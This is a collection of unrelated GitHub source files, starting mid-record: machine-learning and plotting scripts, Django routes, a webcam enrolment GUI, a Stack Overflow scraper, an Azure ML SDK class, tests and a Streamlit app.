0\n","repo_name":"reedling/ai-bc","sub_path":"player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":9213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"4067189933","text":"import pandas as pd\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.metrics 
import mean_absolute_error\nfrom sklearn.model_selection import train_test_split\n\ndef modelValidation():\n file_path = \"/Users/timmanas/ProgrammingProjects/ProgrammingRecipesPython/res/melb_data.csv\"\n home_data = pd.read_csv(file_path)\n\n y = home_data.Price\n\n # Note: 'Lattitude' and 'Longtitude' are the column names as actually spelled in melb_data.csv\n features = ['Rooms', 'Bathroom', 'Landsize', 'Lattitude', 'Longtitude']\n X = home_data[features]\n\n # Randomly split the data into training and validation sets\n train_X, val_X, train_y, val_y = train_test_split(X, y, random_state=0)\n\n model = DecisionTreeRegressor()\n model.fit(train_X, train_y)\n\n predicted_home_prices = model.predict(val_X)\n\n # Calculate the validation error\n mae = mean_absolute_error(val_y, predicted_home_prices)\n print(\"Mean Absolute Error: \", mae)\n\n\nif __name__ == '__main__':\n modelValidation()\n\n\n'''\nWhat is model validation?\n- Evaluate the predictive accuracy of the model\n\nExample of model validation: Mean Absolute Error (MAE)\nFormula:\nerror = actual - predicted\nIf a house costs $150,000 and the predicted price is $100,000, then the error is $50,000.\n\nNote: To calculate MAE, a fitted model is required.\n'''","repo_name":"timManas/PythonProgrammingRecipes","sub_path":"project/src/MachineLearning/ModelValidation.py","file_name":"ModelValidation.py","file_ext":"py","file_size_in_byte":1221,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"43555607144","text":"from django.conf.urls import url\nfrom django.urls import path, re_path\n\nfrom . import views\n\nurlpatterns = [\n path('login/', views.login_user),\n path('register/', views.register_user),\n path('logout/', views.logout_user),\n path('getInfo/', views.user_info),\n path('media/<str:year>/<str:month>/<str:filename>', views.my_image),\n path('get_my_class/', views.my_class),\n path('add_sign/', views.add_sign),\n path('send_group_msg/', views.send_group_msg),\n path('my_question/', views.my_question),\n path('my_white_app/', views.my_white_app),\n path('is_correct/', views.VerificationAnswer),\n]","repo_name":"xdtcssdi/sc_p","sub_path":"KEKEAPI/api/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"19070783358","text":"import cv2\r\nimport shutil,os\r\nimport tkinter as tk\r\nfrom tkinter import *\r\nglobal check\r\ndef take_photo():\r\n cam = cv2.VideoCapture(0)\r\n\r\n cv2.namedWindow(\"test\")\r\n\r\n img_counter = 0\r\n\r\n while True:\r\n ret, frame = cam.read()\r\n if not ret:\r\n print(\"failed to grab frame\")\r\n break\r\n cv2.imshow(\"test\", frame)\r\n\r\n k = cv2.waitKey(1)\r\n if k%256 == 27:\r\n # ESC pressed\r\n print(\"Escape hit, closing...\")\r\n break\r\n elif k%256 == 32:\r\n # SPACE pressed\r\n global name1\r\n name1=str(name.get())\r\n img_name = name1+\".jpg\"\r\n cv2.imwrite(img_name, frame)\r\n label()\r\n break\r\n #print(\"{} written!\".format(img_name))\r\n\r\n cam.release()\r\n\r\n cv2.destroyAllWindows()\r\n\r\n\r\ndef take_path():\r\n shutil.copy(\"source\", \"destination\")\r\n\r\ncheck=0\r\nen=tk.Tk()\r\nen.title(\"ENROLMENT\")\r\nen.geometry(\"500x500\")\r\nl2 = tk.Label(text='ENTER NAME', font='calibre 13 bold', fg='red')\r\nl2.place(x=127, y=105, anchor=CENTER)\r\nname= tk.Entry(bg='white', fg='red', font='calibre 13 bold')\r\nname.place(x=350, y=105, anchor=CENTER, width=300)\r\nb1 = tk.Button(text='Take Photo', font='bold', command=lambda: take_photo(), fg='red')\r\nb1.place(x=150, y=140)
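A minimal sketch of the MAE arithmetic described in the ModelValidation.py notes above, using toy values (the prices here are illustrative only):

actual = [150000, 200000, 180000]
predicted = [100000, 220000, 180000]
# MAE is the mean of the absolute errors |actual - predicted|
mae = sum(abs(a - p) for a, p in zip(actual, predicted)) / len(actual)
print(mae)  # (50000 + 20000 + 0) / 3 = 23333.33...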
\r\n\r\nl3 = tk.Label(text='PRESS SPACE BAR TO CAPTURE PHOTO', font='calibre 13 bold', fg='red')\r\nl3.place(x=200, y=200, anchor=CENTER)\r\ndef label():\r\n l3 = tk.Label(text=name1+\".jpg successfully saved!!\", font='calibre 13 bold', fg='red')\r\n l3.place(x=200, y=200, anchor=CENTER, width=350)\r\nen.mainloop()\r\n\r\n","repo_name":"manojtummala/Face-Recognition-Attendence-System","sub_path":"enrollment.py","file_name":"enrollment.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"71503961121","text":"#!/usr/bin/env python3\n\nfrom pprint import pprint\nfrom collections import deque, defaultdict\nimport sys\n\nsys.setrecursionlimit(10 ** 6)\ninput = sys.stdin.buffer.readline\ninf = float(\"inf\")\n\nQ = int(input())\nqueries = []\n\nfor _ in range(Q):\n l, r = map(int, input().split())\n queries.append([l, r])\n# print(queries)\n\nMAX = 10 ** 5 + 1\n\n# Sieve of Eratosthenes\nis_prime = [1 for _ in range(MAX)]\nis_prime[0] = 0\nis_prime[1] = 0\n\nfor i in range(2, MAX):\n if not is_prime[i]:\n continue\n j = i + i\n while j < MAX:\n is_prime[j] = 0\n j += i\n\na = [0 for _ in range(MAX)]\nfor i in range(MAX):\n if i % 2 == 0:\n continue\n if is_prime[i] and is_prime[(i + 1) // 2]:\n a[i] = 1\n\ncum_sum = [0 for _ in range(MAX + 1)]\nfor i in range(MAX):\n cum_sum[i + 1] = cum_sum[i] + a[i]\n\nfor left, right in queries:\n # print(f\"s[left] = {cum_sum[left]}\")\n # print(f\"s[right] = {cum_sum[right]}\")\n x = cum_sum[right + 1] - cum_sum[left]\n print(x)\n","repo_name":"d-matsui/atcorder","sub_path":"100-problems/d-2017-like-number.py","file_name":"d-2017-like-number.py","file_ext":"py","file_size_in_byte":990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70450979361","text":"import numpy as np\n\nfrom data_sequences import utils\n\n\ndef test_downloader_makedirs(tmpdir):\n root_path = tmpdir.mkdir(\"root_dir\")\n new_path = root_path.join(\"new_folder\")\n # check that the root dir is empty\n assert len(root_path.listdir()) == 0\n # check that the new folder was created\n utils.makedirs(str(new_path))\n assert len(root_path.listdir()) == 1\n # check that no new folders were created and no exceptions were raised\n utils.makedirs(str(new_path))\n assert len(root_path.listdir()) == 1\n\n\ndef test_nd_array_to_from_one_hot():\n n_classes = 10\n arr = np.tile(np.arange(n_classes), (5, 2))\n # convert to one hot\n converted = utils.nd_array_to_one_hot(arr, n_classes)\n assert converted.shape[-1] == n_classes\n assert len(converted.shape) == len(arr.shape) + 1\n for i in range(n_classes):\n assert sum(converted[0][i]) == 1\n # convert back from one hot\n converted_back = utils.nd_array_from_one_hot(converted)\n assert converted_back.shape == arr.shape\n assert np.all(arr == converted_back)\n","repo_name":"ikhlestov/data_sequences","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"3573101432","text":"from typing import Dict, List, Union\n\nfrom marshmallow import INCLUDE, Schema\n\nfrom ... 
import MpiDistribution, PyTorchDistribution, TensorFlowDistribution, RayDistribution\nfrom ..._schema import PathAwareSchema\nfrom ..._schema.core.fields import DistributionField\nfrom ...entities import CommandJobLimits, JobResourceConfiguration\nfrom ...entities._util import get_rest_dict_for_node_attrs\nfrom .._schema.component import NodeType\nfrom ..entities.component import InternalComponent\nfrom ..entities.node import InternalBaseNode\n\n\nclass Command(InternalBaseNode):\n \"\"\"Node of internal command components in pipeline with specific run settings.\n\n Different from azure.ai.ml.entities.Command, type of this class is CommandComponent.\n \"\"\"\n\n def __init__(self, **kwargs):\n node_type = kwargs.pop(\"type\", None) or NodeType.COMMAND\n super(Command, self).__init__(type=node_type, **kwargs)\n self._init = True\n self._resources = kwargs.pop(\"resources\", JobResourceConfiguration())\n self._compute = kwargs.pop(\"compute\", None)\n self._environment = kwargs.pop(\"environment\", None)\n self._environment_variables = kwargs.pop(\"environment_variables\", None)\n self._limits = kwargs.pop(\"limits\", CommandJobLimits())\n self._init = False\n\n @property\n def compute(self) -> str:\n \"\"\"Get the compute definition for the command.\n\n :return: The compute definition\n :rtype: str\n \"\"\"\n return self._compute\n\n @compute.setter\n def compute(self, value: str):\n \"\"\"Set the compute definition for the command.\n\n :param value: The new compute definition\n :type value: str\n \"\"\"\n self._compute = value\n\n @property\n def environment(self) -> str:\n \"\"\"Get the environment definition for the command.\n\n :return: The environment definition\n :rtype: str\n \"\"\"\n return self._environment\n\n @environment.setter\n def environment(self, value: str):\n \"\"\"Set the environment definition for the command.\n\n :param value: The new environment definition\n :type value: str\n \"\"\"\n self._environment = value\n\n @property\n def environment_variables(self) -> Dict[str, str]:\n \"\"\"Get the environment variables for the command.\n\n :return: The environment variables\n :rtype: Dict[str, str]\n \"\"\"\n return self._environment_variables\n\n @environment_variables.setter\n def environment_variables(self, value: Dict[str, str]):\n \"\"\"Set the environment variables for the command.\n\n :param value: The new environment variables\n :type value: Dict[str, str]\n \"\"\"\n self._environment_variables = value\n\n @property\n def limits(self) -> CommandJobLimits:\n return self._limits\n\n @limits.setter\n def limits(self, value: CommandJobLimits):\n self._limits = value\n\n @property\n def resources(self) -> JobResourceConfiguration:\n \"\"\"Compute Resource configuration for the component.\n\n :return: The resource configuration\n :rtype: JobResourceConfiguration\n \"\"\"\n return self._resources\n\n @resources.setter\n def resources(self, value: JobResourceConfiguration):\n self._resources = value\n\n @classmethod\n def _picked_fields_from_dict_to_rest_object(cls) -> List[str]:\n return [\"environment\", \"limits\", \"resources\", \"environment_variables\"]\n\n @classmethod\n def _create_schema_for_validation(cls, context) -> Union[PathAwareSchema, Schema]:\n from .._schema.command import CommandSchema\n\n return CommandSchema(context=context)\n\n def _to_rest_object(self, **kwargs) -> dict:\n rest_obj = super()._to_rest_object(**kwargs)\n rest_obj.update(\n {\n \"limits\": get_rest_dict_for_node_attrs(self.limits, clear_empty_value=True),\n \"resources\": 
get_rest_dict_for_node_attrs(self.resources, clear_empty_value=True),\n }\n )\n return rest_obj\n\n @classmethod\n def _from_rest_object_to_init_params(cls, obj):\n obj = InternalBaseNode._from_rest_object_to_init_params(obj)\n\n if \"resources\" in obj and obj[\"resources\"]:\n obj[\"resources\"] = JobResourceConfiguration._from_rest_object(obj[\"resources\"])\n\n # handle limits\n if \"limits\" in obj and obj[\"limits\"]:\n obj[\"limits\"] = CommandJobLimits._from_rest_object(obj[\"limits\"])\n return obj\n\n\nclass Distributed(Command):\n def __init__(self, **kwargs):\n super(Distributed, self).__init__(**kwargs)\n self._distribution = kwargs.pop(\"distribution\", None)\n self._type = NodeType.DISTRIBUTED\n if self._distribution is None:\n # hack: distribution.type is required to set distribution, which is defined in launcher.type\n if (\n isinstance(self.component, InternalComponent)\n and self.component.launcher\n and \"type\" in self.component.launcher\n ):\n self.distribution = {\"type\": self.component.launcher[\"type\"]}\n else:\n raise ValueError(\n \"launcher.type must be specified in definition of DistributedComponent but got {}\".format(\n self.component\n )\n )\n\n @property\n def distribution(\n self,\n ) -> Union[PyTorchDistribution, MpiDistribution, TensorFlowDistribution, RayDistribution]:\n \"\"\"The distribution config of component, e.g. distribution={'type': 'mpi'}.\n\n :return: The distribution config\n :rtype: Union[PyTorchDistribution, MpiDistribution, TensorFlowDistribution, RayDistribution]\n \"\"\"\n return self._distribution\n\n @distribution.setter\n def distribution(\n self,\n value: Union[Dict, PyTorchDistribution, TensorFlowDistribution, MpiDistribution, RayDistribution],\n ):\n if isinstance(value, dict):\n dist_schema = DistributionField(unknown=INCLUDE)\n value = dist_schema._deserialize(value=value, attr=None, data=None)\n self._distribution = value\n\n @classmethod\n def _create_schema_for_validation(cls, context) -> Union[PathAwareSchema, Schema]:\n from .._schema.command import DistributedSchema\n\n return DistributedSchema(context=context)\n\n @classmethod\n def _picked_fields_from_dict_to_rest_object(cls) -> List[str]:\n return Command._picked_fields_from_dict_to_rest_object() + [\"distribution\"]\n\n def _to_rest_object(self, **kwargs) -> dict:\n rest_obj = super()._to_rest_object(**kwargs)\n distribution = self.distribution._to_rest_object() if self.distribution else None # pylint: disable=no-member\n rest_obj.update(\n {\n \"distribution\": get_rest_dict_for_node_attrs(distribution),\n }\n )\n return rest_obj\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/_internal/entities/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":6950,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"74086978721","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom setuptools import setup, find_packages\nimport py3dtiles_merger\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nwith open('README.rst') as f:\n long_description = f.read()\n\nsetup(\n name='py3dtiles_merger',\n version=py3dtiles_merger.__version__,\n description=\"Merge independent 3dtiles tileset.json generated with py3dtiles into one.\",\n long_description=long_description,\n author=\"Loïc Messal\",\n author_email='Tofull@users.noreply.github.com',\n url='https://github.com/tofull/py3dtiles_merger',\n 
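    # Package only py3dtiles_merger itself; the console-script entry point is registered below.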
packages=find_packages(include=['py3dtiles_merger']),\n include_package_data=True,\n install_requires=requirements,\n license=\"MIT\",\n zip_safe=False,\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Natural Language :: French',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.6',\n ],\n test_suite='tests',\n entry_points={\n 'console_scripts': ['py3dtiles_merger=py3dtiles_merger.command_line:command_line'],\n }\n)\n","repo_name":"Tofull/py3dtiles_merger","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"54"} +{"seq_id":"33679603079","text":"import csv\nimport requests\nimport io\nfrom bs4 import BeautifulSoup\nfrom typing import List\nfrom datetime import datetime\nfrom dateutil.parser import parse\nfrom random import randint\nfrom time import sleep\n\n\nclass StackOverFlow:\n def __init__(self, *,urls: List = [], max_answers: int = 3, max_divisions: int = 3) -> None:\n '''Initialize variables used for scraping.'''\n self.urls: List = urls\n self.url: str = \"\"\n self.max_answers = max_answers\n self.max_divisions = max_divisions\n\n self.base_url: str = 'https://www.google.com/search'\n self.result: List = []\n\n self.headers = {\n 'User-Agent': 'Mozilla/5.0',\n }\n\n self.csv_headers = [None]\n\n def fetch(self):\n '''Fetch the url and return the HTTP response.'''\n response = requests.get(self.url, headers = self.headers)\n\n return response\n\n def parse(self, *, html) -> bool:\n '''Parse the answers on the page and append them to the results.'''\n content = BeautifulSoup(html, 'lxml')\n\n features: dict = {}\n title = content.title.text.strip().replace(' - Stack Overflow', \" \").strip()\n title = title.replace(\"\\\"\", \"\")\n title = title.replace(\"'\", \"\")\n all_answers = content.select('div[class*=\"answer js-answer\"]')\n\n if all_answers:\n features['url'] = self.url\n features['title'] = title\n\n count = 1\n for ans in all_answers:\n answer = ans.find(\"div\", {\"class\": \"answercell post-layout--right\"})\n post_body = answer.find(\"div\", {\"class\": \"s-prose js-post-body\"})\n post_body = str(post_body)\n post_body = post_body.replace(\"<div class=\\\"s-prose js-post-body\\\" itemprop=\\\"text\\\">\", \" \")\n post_body = post_body[:-6]\n post_body = post_body.strip()\n post_body = post_body.replace(\"\\\"\", \"\")\n post_body = post_body.replace(\"'\", \"\")\n post_body = post_body.strip().encode('utf-8')\n \n features[f'best_answer_{count}'] = post_body.decode('utf-8')\n\n if count == self.max_answers:\n break\n else:\n count+=1\n \n if len(features.keys()) > len(self.csv_headers):\n self.csv_headers = features.keys()\n\n self.result.append(features)\n return True\n\n def write_csv(self, file_name: str = ''):\n '''Save results to csv.'''\n print('Saving to csv....')\n\n if self.result: \n with open(f'{file_name}', 'w', newline = '', encoding = 'utf-8') as csv_file:\n writer_object = csv.DictWriter(csv_file, fieldnames = self.csv_headers)\n writer_object.writeheader()\n\n for row in self.result:\n writer_object.writerow(row)\n\n print(f\"Saved to {file_name}\")\n\n def open_csv(self):\n '''Open the previously saved results csv.'''\n print(\"opening csv\")\n \n with open('results.csv', 'r', newline='', encoding='utf-8') as csv_file:\n _dict_reader = csv.DictReader(csv_file)\n self._taken = list(_dict_reader)\n \n 
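        # Reload the rows saved by a previous run: remember which URLs were already
        # processed (the 'valid_urls' column) and seed self.result with the old rows.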
self._done = [_val['valid_urls'] for _val in self._taken]\n self.result = self._taken\n\n def store_response(self, *, response, page):\n '''Save the response as html.'''\n if response.status_code == 200:\n print('Saving response as html')\n filename = 'res' + str(page) + '.html'\n with io.open(filename, 'w', encoding = 'utf-8') as html_file:\n html_file.write(response.text)\n print('Done')\n else:\n print('Bad response!')\n \n def load_response(self): \n '''Load an html file.'''\n html = ''\n with open('res.html', 'r') as html_file:\n for line in html_file.read():\n html += line\n return html\n \n def run(self):\n '''Run the scraper over all the urls.'''\n self.now = str(datetime.today()).replace(':','-')\n print(\"Scraping is running, please don't exit...\")\n counter = 0\n part = 0\n actual_counter = 0\n\n for url in self.urls:\n\n sleep(randint(2,3))\n \n self.url = url\n resp = self.fetch()\n _boolean = self.parse(html = resp.content)\n actual_counter += 1\n\n if _boolean: \n counter+=1\n print(url)\n if counter % self.max_divisions == 0:\n part+=1 \n print(len(self.csv_headers))\n # print(self.result)\n self.write_csv(file_name = f\"{self.now}_part{part}.csv\")\n self.csv_headers = [None]\n self.result = []\n continue\n else:\n if (len(self.urls) - counter) > self.max_divisions:\n continue\n else:\n if actual_counter == len(self.urls):\n part += 1 \n self.write_csv(file_name = f\"{self.now}_part{part}.csv\")\n else:\n continue\n\n if actual_counter == len(self.urls):\n part += 1\n self.write_csv(file_name = f\"{self.now}_part{part}.csv\")\n\n\nif __name__ == '__main__':\n '''Run main file.'''\n file = open('stack_urls.txt', 'r', encoding='utf-8')\n urls: List = [acc.strip() for acc in file.readlines()]\n max_answers: int = 3\n max_divisions: int = 3\n \n #Run scraper\n scraper = StackOverFlow(urls= urls, max_answers = max_answers, max_divisions = max_divisions)\n scraper.run()\n","repo_name":"markokow/upwork_scrapers","sub_path":"Upwork/sastry/stackoveflow_modified/stackoverflow_modified.py","file_name":"stackoverflow_modified.py","file_ext":"py","file_size_in_byte":5799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"29924037526","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as colors\n# from matplotlib.colors import BoundaryNorm\n\n\ndef plot(aryVslSpc, strTtl, strXlabel, strYlabel, strPathOut, tpleLimX=None,\n tpleLimY=None, varMin=None, varMax=None):\n \"\"\"Plot visual space projection of parameter estimates.\"\"\"\n # Font type:\n strFont = 'Liberation Sans'\n\n # Font colour:\n vecFontClr = np.array([17.0/255.0, 85.0/255.0, 124.0/255.0])\n\n # Colour scale minimum:\n if varMin is None:\n varMin = np.percentile(aryVslSpc, 1.0)\n varMin = (np.floor(varMin * 10.0) / 10.0)\n # varMin = (np.floor(varMin * 0.1) / 0.1)\n # varMin = np.floor(varMin)\n\n # Colour scale maximum:\n if varMax is None:\n varMax = np.percentile(aryVslSpc, 99.0)\n varMax = (np.ceil(varMax * 10.0) / 10.0)\n # varMax = (np.ceil(varMax * 0.1) / 0.1)\n # varMax = np.ceil(varMax)\n\n # Safeguard to avoid division by zero in case of no negative values:\n # if np.less_equal(0.0, varMin):\n # varMin = -1.0\n\n # Same scale for negative and positive colour bar:\n if np.greater(np.absolute(varMin), varMax):\n varMax = np.absolute(varMin)\n else:\n varMin = np.multiply(-1.0, np.absolute(varMax))\n\n # Create main figure:\n fig01 = plt.figure(figsize=(5.0, 3.0),\n dpi=200.0,\n facecolor=([1.0, 1.0, 1.0]),\n edgecolor=([1.0, 1.0, 
1.0]))\n\n # Big subplot in the background for common axes labels:\n axsCmn = fig01.add_subplot(111)\n\n # Turn off axis lines and ticks of the big subplot:\n axsCmn.spines['top'].set_color('none')\n axsCmn.spines['bottom'].set_color('none')\n axsCmn.spines['left'].set_color('none')\n axsCmn.spines['right'].set_color('none')\n axsCmn.tick_params(labelcolor='w',\n top=False,\n bottom=False,\n left=False,\n right=False)\n\n # Set and adjust common axes labels:\n axsCmn.set_xlabel(strXlabel,\n alpha=1.0,\n fontname=strFont,\n fontweight='normal',\n fontsize=7.0,\n color=vecFontClr,\n position=(0.5, 0.0))\n axsCmn.set_ylabel(strYlabel,\n alpha=1.0,\n fontname=strFont,\n fontweight='normal',\n fontsize=7.0,\n color=vecFontClr,\n position=(0.0, 0.5))\n axsCmn.set_title(strTtl,\n alpha=1.0,\n fontname=strFont,\n fontweight='bold',\n fontsize=10.0,\n color=vecFontClr,\n position=(0.5, 1.1))\n\n # Create colour-bar axis:\n axsTmp = fig01.add_subplot(111)\n\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n # Number of colour increments:\n varNumClr = 20\n\n # Colour values for the first colormap (used for negative values):\n aryClr01 = plt.cm.PuBu(np.linspace(0.1, 1.0, varNumClr))\n\n # Invert the first colour map:\n aryClr01 = np.flipud(np.array(aryClr01, ndmin=2))\n\n # Colour values for the second colormap (used for positive values):\n aryClr02 = plt.cm.OrRd(np.linspace(0.1, 1.0, varNumClr))\n\n # Combine negative and positive colour arrays:\n aryClr03 = np.vstack((aryClr01, aryClr02))\n\n # Create new custom colormap, combining two default colormaps:\n objCustClrMp = colors.LinearSegmentedColormap.from_list('custClrMp',\n aryClr03)\n\n # Lookup vector for negative colour range:\n vecClrRngNeg = np.linspace(varMin, 0.0, num=varNumClr)\n\n # Lookup vector for positive colour range:\n vecClrRngPos = np.linspace(0.0, varMax, num=varNumClr)\n\n # Stack lookup vectors:\n vecClrRng = np.hstack((vecClrRngNeg, vecClrRngPos))\n\n # 'Normalize' object, needed to use custom colour maps and lookup table\n # with matplotlib:\n objClrNorm = colors.BoundaryNorm(vecClrRng, objCustClrMp.N)\n\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n\n # Array needs to be transposed for image coordinate conventions.\n aryVslSpc = aryVslSpc.T\n\n # Create plot:\n pltTmpCorr = plt.imshow(aryVslSpc,\n interpolation='none', # 'bicubic',\n origin='lower',\n norm=objClrNorm,\n cmap=objCustClrMp,\n aspect='equal')\n\n if not (tpleLimX is None):\n\n # Position of x labels:\n vecPosLblX = np.linspace(0.0,\n (aryVslSpc.shape[1] - 1),\n num=int(tpleLimX[2]),\n endpoint=True)\n vecPosLblX = np.around(vecPosLblX, decimals=2)\n lstPosLblX = vecPosLblX.tolist()\n\n # Set position of x labels:\n axsTmp.set_xticks(lstPosLblX)\n\n # Labels for x axis:\n vecLblX = np.linspace(tpleLimX[0],\n tpleLimX[1],\n num=int(tpleLimX[2]),\n endpoint=True).tolist()\n vecLblX = np.around(vecLblX, decimals=2)\n lstLblX = vecLblX.tolist()\n\n # Set axis labels:\n axsTmp.set_xticklabels(lstLblX)\n\n if not (tpleLimY is None):\n\n # Position of y labels:\n vecPosLblY = np.linspace(0.0,\n (aryVslSpc.shape[0] - 1),\n num=int(tpleLimY[2]),\n endpoint=True)\n vecPosLblY = np.around(vecPosLblY, decimals=2)\n lstPosLblY = vecPosLblY.tolist()\n\n # Set position of y labels:\n axsTmp.set_yticks(lstPosLblY)\n\n # Labels for y axis:\n vecLblY = np.linspace(tpleLimY[0],\n tpleLimY[1],\n num=int(tpleLimY[2]),\n endpoint=True).tolist()\n vecLblY = np.around(vecLblY, decimals=2)\n lstLblY = vecLblY.tolist()\n\n 
# Set axis labels:\n axsTmp.set_yticklabels(lstLblY)\n\n # Turn of ticks:\n axsTmp.tick_params(labelcolor=([0.0, 0.0, 0.0]),\n top=False,\n bottom=False,\n left=False,\n right=False)\n\n # We create invisible axes for the colour bar slightly to the right of the\n # position of the last data-axes. First, retrieve position of last\n # data-axes:\n objBbox = axsTmp.get_position()\n # We slightly adjust the x-position of the colour-bar axis, by shifting\n # them to the right:\n vecClrAxsPos = np.array([(objBbox.x0 * 7.5),\n objBbox.y0,\n objBbox.width,\n objBbox.height])\n # Create colour-bar axis:\n axsClr = fig01.add_axes(vecClrAxsPos,\n frameon=False)\n\n # Add colour bar:\n pltClrbr = fig01.colorbar(pltTmpCorr,\n ax=axsClr,\n fraction=1.0,\n shrink=1.0)\n\n # The values to be labeled on the colour bar:\n # vecClrLblsPos01 = np.arange(varMin, 0.0, 10)\n # vecClrLblsPos02 = np.arange(0.0, varMax, 100)\n vecClrLblsPos01 = np.linspace(varMin, 0.0, num=3)\n vecClrLblsPos02 = np.linspace(0.0, varMax, num=3)\n vecClrLblsPos = np.hstack((vecClrLblsPos01, vecClrLblsPos02))\n\n # The labels (strings):\n # vecClrLblsStr = map(str, vecClrLblsPos)\n vecClrLblsStr = [str(x) for x in vecClrLblsPos]\n\n # Set labels on coloubar:\n pltClrbr.set_ticks(vecClrLblsPos)\n pltClrbr.set_ticklabels(vecClrLblsStr)\n # Set font size of colour bar ticks, and remove the 'spines' on the right\n # side:\n pltClrbr.ax.tick_params(labelsize=8.0,\n tick2On=False)\n\n # Make colour-bar axis invisible:\n axsClr.axis('off')\n\n # Save figure:\n fig01.savefig(strPathOut,\n dpi=160.0,\n facecolor='w',\n edgecolor='w',\n orientation='landscape',\n bbox_inches='tight',\n pad_inches=0.2,\n transparent=False,\n frameon=None)\n\n # Close figure:\n plt.close(fig01)\n","repo_name":"ingo-m/py_depthsampling","sub_path":"py_depthsampling/project/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":8445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"32948078968","text":"import numpy as np\nimport pandas as pd\nimport xarray as xr\nimport matplotlib.pyplot as plt\n\n\ndef costomize_rolling(df, var):\n indexer = pd.api.indexers.FixedForwardWindowIndexer(window_size=14)\n # compute 'forward' mean\n df[var + '_rolling'] = df[var].rolling(window=indexer, min_periods=14).mean()\n # shift to make week 3 & 4 ground truth\n df[var + '_shift'] = df[var + '_rolling'].shift(-14)\n return df\n\n\n# read raw data\ndf_tmp2m = pd.read_hdf('tmp2m_western_us_updated.h5')\ndf_tmp2m = df_tmp2m.reset_index()\ndf_tmp2m['month'] = df_tmp2m.start_date.dt.month\ndf_tmp2m['day'] = df_tmp2m.start_date.dt.day\n# read climatology\nclimo = pd.read_hdf('climo_all.h5')\nclimo = climo.drop(['tmp2m_mean_raw', 'tmp2m_std_raw'], axis=1)\n# compute anomalies\ndata = df_tmp2m.merge(climo, on=['lat', 'lon', 'month', 'day'], how='left')\ndata['anom'] = data['tmp2m'] - data['tmp2m_mean_smooth']\ndata = data.set_index(['lat', 'lon', 'start_date'])\ndf_tmp2m_all_rolling = data.groupby(['lat', 'lon']).apply(lambda df: costomize_rolling(df, 'anom'))\ndf_tmp2m_all_rolling = df_tmp2m_all_rolling.dropna()\ntruth = df_tmp2m_all_rolling['anom_shift'].to_frame()\ntruth.columns = ['target']\ntruth.to_hdf('tmp2m_western_us_anom_rmm.h5', key='data')\n","repo_name":"Sijie-umn/SSF-MIP","sub_path":"Groundtruth/create_target_variables.py","file_name":"create_target_variables.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"54"} 
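The ground-truth script above builds its week-3/4 target by taking a forward-looking 14-day rolling mean and then shifting it back 14 days. A minimal sketch of that indexer-plus-shift pattern on toy data (the series values and window length here are illustrative only):

import pandas as pd

s = pd.Series(range(30), index=pd.date_range('2020-01-01', periods=30, freq='D'))
indexer = pd.api.indexers.FixedForwardWindowIndexer(window_size=14)
fwd_mean = s.rolling(window=indexer, min_periods=14).mean()  # at day t: mean over days t..t+13
target = fwd_mean.shift(-14)                                 # at day t: mean over days t+14..t+27
print(target.dropna().head())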
+{"seq_id":"4654113030","text":"import streamlit as st\nimport pandas as pd\nimport numpy as np\nimport altair as alt\nimport random\nimport os\n\nfrom pages.log import log\nfrom pages.skill_dash import skill_dash\nfrom pages.boss_dash import boss_dash\nfrom utils.config import format_sel, local_css\n\n\ndef main():\n\n st.set_page_config(page_title=\"Adventurer's Log\",\n page_icon=\"static/img/73.png\")\n\n pd.options.mode.chained_assignment = None\n local_css(\"style.css\")\n\n # Register your pages\n pages = {\n \"Adventurer's Log\": log,\n \"Skilling Dashboard\": skill_dash,\n \"Bossing Dashboard\": boss_dash,\n }\n\n st.sidebar.title(\"Adventurer's Log 📔\")\n # Widget to select your page, you can choose between radio buttons or a selectbox\n page = st.sidebar.radio(\"Select your page\", tuple(pages.keys()))\n virtual = st.sidebar.checkbox(\"Enable virtual levels\")\n #page = st.sidebar.radio(\"Select your page\", tuple(pages.keys()))\n\n # username = st.sidebar.text_input(\n # \"Enter a username\", value='', max_chars=12).replace(\"-\", \" \")\n\n username = st.sidebar.text_input(\n \"Enter a username\", \"Pompelmo\")\n\n if page in [\"Skilling Dashboard\", \"Bossing Dashboard\"]:\n period = st.sidebar.selectbox('Tracking period:',\n ('day', 'week', 'month', 'year'),\n index=1, format_func=format_sel)\n\n # Display the selected page with the session state\n pages[page](username, period)\n else:\n\n group = st.sidebar.selectbox('Group by:',\n ('session', 'day'),\n index=0, 